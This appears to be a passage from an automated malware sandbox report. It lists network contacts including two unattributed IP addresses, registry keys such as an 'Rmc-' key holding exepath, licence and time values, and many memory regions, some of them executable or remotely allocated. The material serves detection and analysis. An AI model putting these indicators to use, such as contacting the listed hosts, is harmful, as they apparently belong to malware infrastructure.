There are 40 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
bg.microsoft.map.fastly.net
|
199.232.214.172
|
||
|
geoplugin.net
|
178.237.33.50
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
103.237.87.32
|
unknown
|
unknown
|
|
|
|
178.237.33.50
|
geoplugin.net
|
Netherlands
|
||
|
103.237.86.247
|
unknown
|
unknown
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Rmc-VEYV6I
|
exepath
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Rmc-VEYV6I
|
licence
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Rmc-VEYV6I
|
time
|
There are 7 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
89C0000
|
direct allocation
|
page execute and read and write
|
|
|
|
5E33000
|
trusted library allocation
|
page read and write
|
|
|
|
B13D000
|
direct allocation
|
page execute and read and write
|
|
|
|
19290072000
|
trusted library allocation
|
page read and write
|
|
|
|
8531000
|
heap
|
page read and write
|
|
|
|
2A7F000
|
stack
|
page read and write
|
|
|
|
704B000
|
stack
|
page read and write
|
||
|
7508000
|
trusted library allocation
|
page read and write
|
||
|
203A1048000
|
heap
|
page read and write
|
||
|
857B000
|
heap
|
page read and write
|
||
|
4C00000
|
heap
|
page read and write
|
||
|
4C01000
|
heap
|
page read and write
|
||
|
7FF848EA0000
|
trusted library allocation
|
page execute and read and write
|
||
|
4C00000
|
heap
|
page read and write
|
||
|
EC1EFFE000
|
stack
|
page read and write
|
||
|
192FCC18000
|
heap
|
page read and write
|
||
|
4C26000
|
heap
|
page read and write
|
||
|
7FF848E90000
|
trusted library allocation
|
page read and write
|
||
|
203A2F64000
|
heap
|
page read and write
|
||
|
4C00000
|
heap
|
page read and write
|
||
|
203A2F12000
|
heap
|
page read and write
|
||
|
203A2F9C000
|
heap
|
page read and write
|
||
|
2D2C000
|
heap
|
page read and write
|
||
|
203A30C4000
|
heap
|
page read and write
|
||
|
203A2DEC000
|
heap
|
page read and write
|
||
|
8584000
|
heap
|
page read and write
|
||
|
400000
|
system
|
page execute and read and write
|
||
|
5BA9000
|
trusted library allocation
|
page read and write
|
||
|
8AC9CCB000
|
stack
|
page read and write
|
||
|
4C19000
|
heap
|
page read and write
|
||
|
70A5000
|
heap
|
page execute and read and write
|
||
|
7060000
|
direct allocation
|
page read and write
|
||
|
203A2F92000
|
heap
|
page read and write
|
||
|
203A2F5C000
|
heap
|
page read and write
|
||
|
192FAA45000
|
heap
|
page read and write
|
||
|
243F3000
|
heap
|
page read and write
|
||
|
8920000
|
trusted library allocation
|
page read and write
|
||
|
2FC4000
|
heap
|
page read and write
|
||
|
240AB000
|
unclassified section
|
page execute and read and write
|
||
|
487D000
|
remote allocation
|
page execute and read and write
|
||
|
7FF848DE4000
|
trusted library allocation
|
page read and write
|
||
|
19280001000
|
trusted library allocation
|
page read and write
|
||
|
203A1186000
|
heap
|
page read and write
|
||
|
50EC000
|
heap
|
page read and write
|
||
|
203A2F5C000
|
heap
|
page read and write
|
||
|
3CE0000
|
remote allocation
|
page execute and read and write
|
||
|
4BE0000
|
heap
|
page read and write
|
||
|
24171000
|
heap
|
page read and write
|
||
|
A73D000
|
direct allocation
|
page execute and read and write
|
||
|
19281F21000
|
trusted library allocation
|
page read and write
|
||
|
203A3020000
|
heap
|
page read and write
|
||
|
4C00000
|
heap
|
page read and write
|
||
|
4C1F000
|
heap
|
page read and write
|
||
|
857B000
|
heap
|
page read and write
|
||
|
2D30000
|
heap
|
page read and write
|
||
|
856F000
|
heap
|
page read and write
|
||
|
4BEC000
|
heap
|
page read and write
|
||
|
3425000
|
heap
|
page read and write
|
||
|
23E9C000
|
stack
|
page read and write
|
||
|
203A2F08000
|
heap
|
page read and write
|
||
|
192FCC0F000
|
heap
|
page read and write
|
||
|
7FF849120000
|
trusted library allocation
|
page read and write
|
||
|
2FC4000
|
heap
|
page read and write
|
||
|
3032000
|
trusted library allocation
|
page read and write
|
||
|
85C8000
|
heap
|
page read and write
|
||
|
192FCC29000
|
heap
|
page read and write
|
||
|
7940000
|
trusted library allocation
|
page read and write
|
||
|
77E0000
|
trusted library allocation
|
page read and write
|
||
|
4C00000
|
heap
|
page read and write
|
||
|
192FC9CF000
|
heap
|
page read and write
|
||
|
7990000
|
trusted library allocation
|
page read and write
|
||
|
203A2DD1000
|
heap
|
page read and write
|
||
|
7920000
|
trusted library allocation
|
page read and write
|
||
|
7960000
|
trusted library allocation
|
page read and write
|
||
|
24580000
|
unclassified section
|
page execute and read and write
|
||
|
24300000
|
heap
|
page read and write
|
||
|
7900000
|
trusted library allocation
|
page read and write
|
||
|
203A1125000
|
heap
|
page read and write
|
||
|
83B0000
|
trusted library allocation
|
page read and write
|
||
|
4BE1000
|
heap
|
page read and write
|
||
|
4BED000
|
heap
|
page read and write
|
||
|
4C62000
|
heap
|
page read and write
|
||
|
4BEE000
|
heap
|
page read and write
|
||
|
6EFE000
|
stack
|
page read and write
|
||
|
192819AC000
|
trusted library allocation
|
page read and write
|
||
|
4AE1000
|
heap
|
page read and write
|
||
|
4C00000
|
heap
|
page read and write
|
||
|
4C26000
|
heap
|
page read and write
|
||
|
7FF849150000
|
trusted library allocation
|
page read and write
|
||
|
8A00000
|
direct allocation
|
page read and write
|
||
|
3019000
|
trusted library allocation
|
page read and write
|
||
|
4BF1000
|
heap
|
page read and write
|
||
|
203A2FA9000
|
heap
|
page read and write
|
||
|
4C06000
|
heap
|
page read and write
|
||
|
4C24000
|
heap
|
page read and write
|
||
|
243F3000
|
heap
|
page read and write
|
||
|
241E8000
|
heap
|
page read and write
|
||
|
857B000
|
heap
|
page read and write
|
||
|
4BE9000
|
heap
|
page read and write
|
||
|
24262000
|
heap
|
page read and write
|
||
|
19280899000
|
trusted library allocation
|
page read and write
|
||
|
2BDE000
|
stack
|
page read and write
|
||
|
575C000
|
heap
|
page read and write
|
||
|
4C00000
|
heap
|
page read and write
|
||
|
23B3F000
|
stack
|
page read and write
|
||
|
29F4000
|
heap
|
page read and write
|
||
|
4BE1000
|
heap
|
page read and write
|
||
|
EC1EB99000
|
stack
|
page read and write
|
||
|
2FC4000
|
heap
|
page read and write
|
||
|
203A1020000
|
heap
|
page read and write
|
||
|
897E000
|
stack
|
page read and write
|
||
|
7662000
|
heap
|
page read and write
|
||
|
3319000
|
heap
|
page read and write
|
||
|
192FC570000
|
heap
|
page execute and read and write
|
||
|
763E000
|
heap
|
page read and write
|
||
|
84D0000
|
heap
|
page read and write
|
||
|
EC1EEFE000
|
stack
|
page read and write
|
||
|
203A1117000
|
heap
|
page read and write
|
||
|
4C00000
|
heap
|
page read and write
|
||
|
318C000
|
stack
|
page read and write
|
||
|
203A104A000
|
heap
|
page read and write
|
||
|
23C3B000
|
stack
|
page read and write
|
||
|
7FF848DE3000
|
trusted library allocation
|
page execute and read and write
|
||
|
9F20000
|
direct allocation
|
page read and write
|
||
|
4C00000
|
heap
|
page read and write
|
||
|
203A3071000
|
heap
|
page read and write
|
||
|
4BEE000
|
heap
|
page read and write
|
||
|
30BE000
|
stack
|
page read and write
|
||
|
203A2DD1000
|
heap
|
page read and write
|
||
|
23750000
|
direct allocation
|
page read and write
|
||
|
2BAC000
|
stack
|
page read and write
|
||
|
203A10BF000
|
heap
|
page read and write
|
||
|
8571000
|
heap
|
page read and write
|
||
|
240D6000
|
direct allocation
|
page execute and read and write
|
||
|
2446B000
|
heap
|
page read and write
|
||
|
4C45000
|
heap
|
page read and write
|
||
|
2C1C000
|
heap
|
page read and write
|
||
|
857E000
|
heap
|
page read and write
|
||
|
70B0000
|
direct allocation
|
page read and write
|
||
|
24454000
|
heap
|
page read and write
|
||
|
203A2DEC000
|
heap
|
page read and write
|
||
|
4C00000
|
heap
|
page read and write
|
||
|
4BEF000
|
heap
|
page read and write
|
||
|
203A2F5C000
|
heap
|
page read and write
|
||
|
4BE1000
|
heap
|
page read and write
|
||
|
4CDA000
|
trusted library allocation
|
page read and write
|
||
|
331A000
|
heap
|
page read and write
|
||
|
76EB000
|
heap
|
page read and write
|
||
|
667D000
|
remote allocation
|
page execute and read and write
|
||
|
29F4000
|
heap
|
page read and write
|
||
|
8573000
|
heap
|
page read and write
|
||
|
2F2F000
|
stack
|
page read and write
|
||
|
29A0000
|
heap
|
page read and write
|
||
|
23D8E000
|
stack
|
page read and write
|
||
|
4BE1000
|
heap
|
page read and write
|
||
|
203A2F4B000
|
heap
|
page read and write
|
||
|
24170000
|
heap
|
page read and write
|
||
|
4BE1000
|
heap
|
page read and write
|
||
|
24454000
|
heap
|
page read and write
|
||
|
203A3072000
|
heap
|
page read and write
|
||
|
3035000
|
trusted library allocation
|
page execute and read and write
|
||
|
2D38000
|
heap
|
page read and write
|
||
|
400000
|
system
|
page execute and read and write
|
||
|
203A2DEC000
|
heap
|
page read and write
|
||
|
203A2F12000
|
heap
|
page read and write
|
||
|
24452000
|
heap
|
page read and write
|
||
|
192FAC35000
|
heap
|
page read and write
|
||
|
19280888000
|
trusted library allocation
|
page read and write
|
||
|
203A2EE0000
|
heap
|
page read and write
|
||
|
203A2F64000
|
heap
|
page read and write
|
||
|
16ACC3DB000
|
heap
|
page read and write
|
||
|
29C0000
|
heap
|
page read and write
|
||
|
4B81000
|
trusted library allocation
|
page read and write
|
||
|
29F4000
|
heap
|
page read and write
|
||
|
2FC5000
|
heap
|
page read and write
|
||
|
203A2F12000
|
heap
|
page read and write
|
||
|
203A2F5C000
|
heap
|
page read and write
|
||
|
2FC4000
|
heap
|
page read and write
|
||
|
3380000
|
heap
|
page read and write
|
||
|
192FC5C0000
|
heap
|
page read and write
|
||
|
192FC974000
|
heap
|
page read and write
|
||
|
203A2990000
|
heap
|
page read and write
|
||
|
846E000
|
stack
|
page read and write
|
||
|
7FF8490C0000
|
trusted library allocation
|
page read and write
|
||
|
859D000
|
heap
|
page read and write
|
||
|
24379000
|
heap
|
page read and write
|
||
|
203A2E01000
|
heap
|
page read and write
|
||
|
203A2DEC000
|
heap
|
page read and write
|
||
|
7FF848DE0000
|
trusted library allocation
|
page read and write
|
||
|
192FAB30000
|
heap
|
page readonly
|
||
|
7FF849050000
|
trusted library allocation
|
page read and write
|
||
|
84F0000
|
heap
|
page read and write
|
||
|
203A2F5C000
|
heap
|
page read and write
|
||
|
203A2F0D000
|
heap
|
page read and write
|
||
|
7FF848F9A000
|
trusted library allocation
|
page read and write
|
||
|
1928022A000
|
trusted library allocation
|
page read and write
|
||
|
2C50000
|
heap
|
page read and write
|
||
|
EC1F1FE000
|
stack
|
page read and write
|
||
|
9F30000
|
direct allocation
|
page read and write
|
||
|
53E6000
|
heap
|
page read and write
|
||
|
24090000
|
unclassified section
|
page execute and read and write
|
||
|
4C00000
|
heap
|
page read and write
|
||
|
24500000
|
unclassified section
|
page execute and read and write
|
||
|
7FF8490B0000
|
trusted library allocation
|
page read and write
|
||
|
203A1186000
|
heap
|
page read and write
|
||
|
203A1099000
|
heap
|
page read and write
|
||
|
5752000
|
heap
|
page read and write
|
||
|
4BE1000
|
heap
|
page read and write
|
||
|
4BFA000
|
heap
|
page read and write
|
||
|
192902FB000
|
trusted library allocation
|
page read and write
|
||
|
192FC910000
|
heap
|
page read and write
|
||
|
31D0000
|
heap
|
page read and write
|
||
|
192804B4000
|
trusted library allocation
|
page read and write
|
||
|
29F4000
|
heap
|
page read and write
|
||
|
203A2F12000
|
heap
|
page read and write
|
||
|
4BE0000
|
heap
|
page read and write
|
||
|
4BF6000
|
heap
|
page read and write
|
||
|
203A2F7D000
|
heap
|
page read and write
|
||
|
8AC8BFE000
|
stack
|
page read and write
|
||
|
203A2F50000
|
heap
|
page read and write
|
||
|
5647000
|
heap
|
page read and write
|
||
|
2FC5000
|
heap
|
page read and write
|
||
|
192FAA84000
|
heap
|
page read and write
|
||
|
8900000
|
trusted library allocation
|
page read and write
|
||
|
78AE000
|
stack
|
page read and write
|
||
|
203A2F4A000
|
heap
|
page read and write
|
||
|
78ED000
|
stack
|
page read and write
|
||
|
203A2EF8000
|
heap
|
page read and write
|
||
|
192FCBB6000
|
heap
|
page read and write
|
||
|
29F4000
|
heap
|
page read and write
|
||
|
3370000
|
trusted library allocation
|
page read and write
|
||
|
16ACC3D0000
|
heap
|
page read and write
|
||
|
2FC4000
|
heap
|
page read and write
|
||
|
4C62000
|
heap
|
page read and write
|
||
|
3003000
|
trusted library allocation
|
page execute and read and write
|
||
|
7698000
|
heap
|
page read and write
|
||
|
7FF849140000
|
trusted library allocation
|
page read and write
|
||
|
8570000
|
trusted library allocation
|
page execute and read and write
|
||
|
203A2FC6000
|
heap
|
page read and write
|
||
|
AB8000
|
stack
|
page read and write
|
||
|
4C45000
|
heap
|
page read and write
|
||
|
2DB0000
|
heap
|
page read and write
|
||
|
203A3000000
|
remote allocation
|
page read and write
|
||
|
4C00000
|
heap
|
page read and write
|
||
|
4BF8000
|
heap
|
page read and write
|
||
|
192902ED000
|
trusted library allocation
|
page read and write
|
||
|
30E0000
|
heap
|
page read and write
|
||
|
5E2E000
|
trusted library allocation
|
page read and write
|
||
|
53E0000
|
trusted library allocation
|
page read and write
|
||
|
BC0000
|
heap
|
page read and write
|
||
|
51E9000
|
heap
|
page read and write
|
||
|
300D000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF849020000
|
trusted library allocation
|
page read and write
|
||
|
74BE000
|
stack
|
page read and write
|
||
|
203A2F4A000
|
heap
|
page read and write
|
||
|
856F000
|
heap
|
page read and write
|
||
|
203A2F01000
|
heap
|
page read and write
|
||
|
192FAC10000
|
heap
|
page execute and read and write
|
||
|
203A3000000
|
remote allocation
|
page read and write
|
||
|
3240000
|
trusted library allocation
|
page read and write
|
||
|
6F7E000
|
stack
|
page read and write
|
||
|
203A2F2E000
|
heap
|
page read and write
|
||
|
84E0000
|
heap
|
page read and write
|
||
|
712D000
|
stack
|
page read and write
|
||
|
331B000
|
heap
|
page read and write
|
||
|
4C26000
|
heap
|
page read and write
|
||
|
7930000
|
trusted library allocation
|
page read and write
|
||
|
76D0000
|
heap
|
page read and write
|
||
|
203A2F2E000
|
heap
|
page read and write
|
||
|
4C04000
|
heap
|
page read and write
|
||
|
19290010000
|
trusted library allocation
|
page read and write
|
||
|
192FA9F0000
|
heap
|
page read and write
|
||
|
45D000
|
system
|
page execute and read and write
|
||
|
2449B000
|
heap
|
page read and write
|
||
|
4C00000
|
heap
|
page read and write
|
||
|
203A104D000
|
heap
|
page read and write
|
||
|
203A116B000
|
heap
|
page read and write
|
||
|
4C24000
|
heap
|
page read and write
|
||
|
23EDF000
|
stack
|
page read and write
|
||
|
23CFF000
|
stack
|
page read and write
|
||
|
7FF848DE2000
|
trusted library allocation
|
page read and write
|
||
|
23F1C000
|
stack
|
page read and write
|
||
|
4AE0000
|
heap
|
page read and write
|
||
|
192FCBBD000
|
heap
|
page read and write
|
||
|
700D000
|
stack
|
page read and write
|
||
|
203A2DEC000
|
heap
|
page read and write
|
||
|
3413000
|
heap
|
page read and write
|
||
|
29CD000
|
heap
|
page read and write
|
||
|
16ACC590000
|
heap
|
page read and write
|
||
|
19280850000
|
trusted library allocation
|
page read and write
|
||
|
EC1F2FF000
|
stack
|
page read and write
|
||
|
4C0B000
|
heap
|
page read and write
|
||
|
4C08000
|
heap
|
page read and write
|
||
|
70C0000
|
direct allocation
|
page read and write
|
||
|
7FF849130000
|
trusted library allocation
|
page read and write
|
||
|
2FC4000
|
heap
|
page read and write
|
||
|
4BE1000
|
heap
|
page read and write
|
||
|
856D000
|
heap
|
page read and write
|
||
|
3138000
|
trusted library allocation
|
page read and write
|
||
|
4BE1000
|
heap
|
page read and write
|
||
|
5C7D000
|
remote allocation
|
page execute and read and write
|
||
|
310E000
|
stack
|
page read and write
|
||
|
203A2F86000
|
heap
|
page read and write
|
||
|
7FF849030000
|
trusted library allocation
|
page read and write
|
||
|
203A2F82000
|
heap
|
page read and write
|
||
|
4BE9000
|
heap
|
page read and write
|
||
|
41B000
|
system
|
page execute and read and write
|
||
|
7500000
|
trusted library allocation
|
page read and write
|
||
|
7FF848DFB000
|
trusted library allocation
|
page read and write
|
||
|
192FAA09000
|
heap
|
page read and write
|
||
|
4C00000
|
heap
|
page read and write
|
||
|
4C00000
|
heap
|
page read and write
|
||
|
4BEA000
|
heap
|
page read and write
|
||
|
289C000
|
stack
|
page read and write
|
||
|
53E0000
|
trusted library allocation
|
page read and write
|
||
|
2FC4000
|
heap
|
page read and write
|
||
|
2D00000
|
heap
|
page read and write
|
||
|
2F7E000
|
stack
|
page read and write
|
||
|
8580000
|
trusted library allocation
|
page read and write
|
||
|
7740000
|
trusted library allocation
|
page read and write
|
||
|
2D4D000
|
heap
|
page read and write
|
||
|
192FC9A3000
|
heap
|
page read and write
|
||
|
341F000
|
stack
|
page read and write
|
||
|
203A2F9C000
|
heap
|
page read and write
|
||
|
203A113A000
|
heap
|
page read and write
|
||
|
89F0000
|
direct allocation
|
page read and write
|
||
|
3060000
|
heap
|
page readonly
|
||
|
4BE1000
|
heap
|
page read and write
|
||
|
23B7E000
|
stack
|
page read and write
|
||
|
4BE4000
|
trusted library allocation
|
page read and write
|
||
|
8490000
|
trusted library allocation
|
page read and write
|
||
|
4C06000
|
heap
|
page read and write
|
||
|
241EA000
|
heap
|
page read and write
|
||
|
7FF848DED000
|
trusted library allocation
|
page execute and read and write
|
||
|
2BC6000
|
stack
|
page read and write
|
||
|
7950000
|
trusted library allocation
|
page read and write
|
||
|
4C00000
|
heap
|
page read and write
|
||
|
873F000
|
heap
|
page read and write
|
||
|
299E000
|
stack
|
page read and write
|
||
|
2950000
|
heap
|
page readonly
|
||
|
4C00000
|
heap
|
page read and write
|
||
|
203A2F4A000
|
heap
|
page read and write
|
||
|
2FC5000
|
heap
|
page read and write
|
||
|
203A2DD4000
|
heap
|
page read and write
|
||
|
4C1E000
|
heap
|
page read and write
|
||
|
84F8000
|
heap
|
page read and write
|
||
|
192FAC26000
|
heap
|
page read and write
|
||
|
8AC9B4E000
|
stack
|
page read and write
|
||
|
4BFB000
|
heap
|
page read and write
|
||
|
3050000
|
trusted library allocation
|
page read and write
|
||
|
4C00000
|
heap
|
page read and write
|
||
|
4BF1000
|
heap
|
page read and write
|
||
|
24452000
|
heap
|
page read and write
|
||
|
1928080B000
|
trusted library allocation
|
page read and write
|
||
|
8765000
|
heap
|
page read and write
|
||
|
7730000
|
heap
|
page execute and read and write
|
||
|
7070000
|
direct allocation
|
page read and write
|
||
|
7270000
|
heap
|
page read and write
|
||
|
2F80000
|
heap
|
page read and write
|
||
|
2BCB000
|
stack
|
page read and write
|
||
|
85C8000
|
heap
|
page read and write
|
||
|
203A2F64000
|
heap
|
page read and write
|
||
|
4BE1000
|
heap
|
page read and write
|
||
|
4C00000
|
heap
|
page read and write
|
||
|
4C1D000
|
heap
|
page read and write
|
||
|
33B7000
|
heap
|
page read and write
|
||
|
B7E000
|
stack
|
page read and write
|
||
|
29F4000
|
heap
|
page read and write
|
||
|
8525000
|
trusted library allocation
|
page read and write
|
||
|
85C8000
|
heap
|
page read and write
|
||
|
19281E1A000
|
trusted library allocation
|
page read and write
|
||
|
7FF848FF0000
|
trusted library allocation
|
page read and write
|
||
|
53E0000
|
trusted library allocation
|
page read and write
|
||
|
203A2F2E000
|
heap
|
page read and write
|
||
|
4BEF000
|
heap
|
page read and write
|
||
|
203A3021000
|
heap
|
page read and write
|
||
|
8759000
|
heap
|
page read and write
|
||
|
203A2DD7000
|
heap
|
page read and write
|
||
|
4C00000
|
heap
|
page read and write
|
||
|
2B20000
|
heap
|
page read and write
|
||
|
7DF459770000
|
trusted library allocation
|
page execute and read and write
|
||
|
2D1F000
|
heap
|
page read and write
|
||
|
456000
|
system
|
page execute and read and write
|
||
|
4C26000
|
heap
|
page read and write
|
||
|
203A0F40000
|
heap
|
page read and write
|
||
|
16ACC585000
|
heap
|
page read and write
|
||
|
24454000
|
heap
|
page read and write
|
||
|
7FF848FA0000
|
trusted library allocation
|
page execute and read and write
|
||
|
5000000
|
heap
|
page read and write
|
||
|
856C000
|
stack
|
page read and write
|
||
|
856E000
|
heap
|
page read and write
|
||
|
79B0000
|
trusted library allocation
|
page read and write
|
||
|
324E000
|
heap
|
page read and write
|
||
|
8AC90FE000
|
stack
|
page read and write
|
||
|
85C8000
|
heap
|
page read and write
|
||
|
2446B000
|
heap
|
page read and write
|
||
|
4BF6000
|
heap
|
page read and write
|
||
|
203A2DEB000
|
heap
|
page read and write
|
||
|
4C01000
|
heap
|
page read and write
|
||
|
4B70000
|
heap
|
page execute and read and write
|
||
|
53E0000
|
trusted library allocation
|
page read and write
|
||
|
8AC8AFE000
|
stack
|
page read and write
|
||
|
4ADE000
|
stack
|
page read and write
|
||
|
74FE000
|
stack
|
page read and write
|
||
|
29F4000
|
heap
|
page read and write
|
||
|
245D6000
|
unclassified section
|
page execute and read and write
|
||
|
29F4000
|
heap
|
page read and write
|
||
|
5253000
|
heap
|
page read and write
|
||
|
857E000
|
heap
|
page read and write
|
||
|
7970000
|
trusted library allocation
|
page read and write
|
||
|
3140000
|
heap
|
page read and write
|
||
|
4BE1000
|
heap
|
page read and write
|
||
|
203A2F6A000
|
heap
|
page read and write
|
||
|
527D000
|
remote allocation
|
page execute and read and write
|
||
|
7FF849040000
|
trusted library allocation
|
page read and write
|
||
|
29F4000
|
heap
|
page read and write
|
||
|
8700000
|
heap
|
page read and write
|
||
|
2D20000
|
heap
|
page read and write
|
||
|
203A10BE000
|
heap
|
page read and write
|
||
|
31F5CFD000
|
stack
|
page read and write
|
||
|
203A1123000
|
heap
|
page read and write
|
||
|
8480000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF849010000
|
trusted library allocation
|
page read and write
|
||
|
89D0000
|
direct allocation
|
page read and write
|
||
|
203A2F96000
|
heap
|
page read and write
|
||
|
4C03000
|
heap
|
page read and write
|
||
|
203A309E000
|
heap
|
page read and write
|
||
|
30D0000
|
trusted library allocation
|
page execute and read and write
|
||
|
192818F6000
|
trusted library allocation
|
page read and write
|
||
|
EC1F4FB000
|
stack
|
page read and write
|
||
|
7FF849090000
|
trusted library allocation
|
page read and write
|
||
|
4C18000
|
heap
|
page read and write
|
||
|
192FAC17000
|
heap
|
page execute and read and write
|
||
|
7770000
|
trusted library allocation
|
page read and write
|
||
|
7980000
|
trusted library allocation
|
page read and write
|
||
|
338F000
|
heap
|
page read and write
|
||
|
563E000
|
heap
|
page read and write
|
||
|
2DF0000
|
trusted library allocation
|
page read and write
|
||
|
4BF2000
|
heap
|
page read and write
|
||
|
16ACC584000
|
heap
|
page read and write
|
||
|
857E000
|
heap
|
page read and write
|
||
|
7A7D000
|
remote allocation
|
page execute and read and write
|
||
|
7FF848F00000
|
trusted library allocation
|
page execute and read and write
|
||
|
4BF0000
|
heap
|
page read and write
|
||
|
203A2DE4000
|
heap
|
page read and write
|
||
|
203A2F6A000
|
heap
|
page read and write
|
||
|
4BEC000
|
heap
|
page read and write
|
||
|
4B5E000
|
stack
|
page read and write
|
||
|
192FC9AB000
|
heap
|
page read and write
|
||
|
245DC000
|
unclassified section
|
page execute and read and write
|
||
|
7FF848F80000
|
trusted library allocation
|
page read and write
|
||
|
8AC9C4A000
|
stack
|
page read and write
|
||
|
4BE1000
|
heap
|
page read and write
|
||
|
4BF0000
|
heap
|
page read and write
|
||
|
4C05000
|
heap
|
page read and write
|
||
|
19280839000
|
trusted library allocation
|
page read and write
|
||
|
EC1F7FF000
|
stack
|
page read and write
|
||
|
4BF0000
|
heap
|
page read and write
|
||
|
203A10CD000
|
heap
|
page read and write
|
||
|
203A2F64000
|
heap
|
page read and write
|
||
|
203A1132000
|
heap
|
page read and write
|
||
|
192FA980000
|
heap
|
page read and write
|
||
|
192FC9F0000
|
heap
|
page read and write
|
||
|
203A3070000
|
heap
|
page read and write
|
||
|
5B91000
|
trusted library allocation
|
page read and write
|
||
|
8AC8DFE000
|
stack
|
page read and write
|
||
|
23740000
|
direct allocation
|
page read and write
|
||
|
4BF0000
|
heap
|
page read and write
|
||
|
19280827000
|
trusted library allocation
|
page read and write
|
||
|
4BF5000
|
heap
|
page read and write
|
||
|
4C24000
|
heap
|
page read and write
|
||
|
16ACC350000
|
heap
|
page read and write
|
||
|
2401E000
|
stack
|
page read and write
|
||
|
89E0000
|
direct allocation
|
page read and write
|
||
|
933D000
|
direct allocation
|
page execute and read and write
|
||
|
4BEC000
|
heap
|
page read and write
|
||
|
324A000
|
heap
|
page read and write
|
||
|
192FA9FF000
|
heap
|
page read and write
|
||
|
8560000
|
heap
|
page read and write
|
||
|
51E1000
|
heap
|
page read and write
|
||
|
192FAC30000
|
heap
|
page read and write
|
||
|
7FF848DF0000
|
trusted library allocation
|
page read and write
|
||
|
19281E21000
|
trusted library allocation
|
page read and write
|
||
|
83A0000
|
trusted library allocation
|
page execute and read and write
|
||
|
3020000
|
trusted library allocation
|
page read and write
|
||
|
8560000
|
heap
|
page read and write
|
||
|
203A1186000
|
heap
|
page read and write
|
||
|
4B1F000
|
stack
|
page read and write
|
||
|
23F9E000
|
stack
|
page read and write
|
||
|
76F9000
|
heap
|
page read and write
|
||
|
29F4000
|
heap
|
page read and write
|
||
|
23710000
|
direct allocation
|
page read and write
|
||
|
8630000
|
heap
|
page read and write
|
||
|
4C05000
|
heap
|
page read and write
|
||
|
86BE000
|
stack
|
page read and write
|
||
|
2FC4000
|
heap
|
page read and write
|
||
|
29F4000
|
heap
|
page read and write
|
||
|
473000
|
system
|
page execute and read and write
|
||
|
7050000
|
direct allocation
|
page read and write
|
||
|
4C00000
|
heap
|
page read and write
|
||
|
716A000
|
stack
|
page read and write
|
||
|
4C24000
|
heap
|
page read and write
|
||
|
53E0000
|
trusted library allocation
|
page read and write
|
||
|
5B81000
|
trusted library allocation
|
page read and write
|
||
|
4BF0000
|
heap
|
page read and write
|
||
|
4BF6000
|
heap
|
page read and write
|
||
|
203A2F6A000
|
heap
|
page read and write
|
||
|
203A2F4A000
|
heap
|
page read and write
|
||
|
1928081F000
|
trusted library allocation
|
page read and write
|
||
|
192FCDE0000
|
heap
|
page read and write
|
||
|
77DD000
|
trusted library allocation
|
page read and write
|
||
|
4BE9000
|
heap
|
page read and write
|
||
|
24454000
|
heap
|
page read and write
|
||
|
8AC8B7D000
|
stack
|
page read and write
|
||
|
4BF1000
|
heap
|
page read and write
|
||
|
203A2EE1000
|
heap
|
page read and write
|
||
|
331E000
|
heap
|
page read and write
|
||
|
7910000
|
trusted library allocation
|
page read and write
|
||
|
4C10000
|
heap
|
page read and write
|
||
|
7FF849070000
|
trusted library allocation
|
page read and write
|
||
|
4BC0000
|
heap
|
page read and write
|
||
|
241E8000
|
heap
|
page read and write
|
||
|
70D0000
|
direct allocation
|
page read and write
|
||
|
8AC870E000
|
stack
|
page read and write
|
||
|
2C10000
|
heap
|
page read and write
|
||
|
203A1179000
|
heap
|
page read and write
|
||
|
4C07000
|
heap
|
page read and write
|
||
|
3070000
|
heap
|
page read and write
|
||
|
203A104C000
|
heap
|
page read and write
|
||
|
192FAA89000
|
heap
|
page read and write
|
||
|
203A2F64000
|
heap
|
page read and write
|
||
|
4C00000
|
heap
|
page read and write
|
||
|
203A2EE1000
|
heap
|
page read and write
|
||
|
23AFE000
|
stack
|
page read and write
|
||
|
1928086C000
|
trusted library allocation
|
page read and write
|
||
|
4C62000
|
heap
|
page read and write
|
||
|
51E0000
|
heap
|
page read and write
|
||
|
192FAA5B000
|
heap
|
page read and write
|
||
|
2FC4000
|
heap
|
page read and write
|
||
|
4BF0000
|
heap
|
page read and write
|
||
|
203A2F2E000
|
heap
|
page read and write
|
||
|
842D000
|
stack
|
page read and write
|
||
|
70E0000
|
direct allocation
|
page read and write
|
||
|
192FC9D2000
|
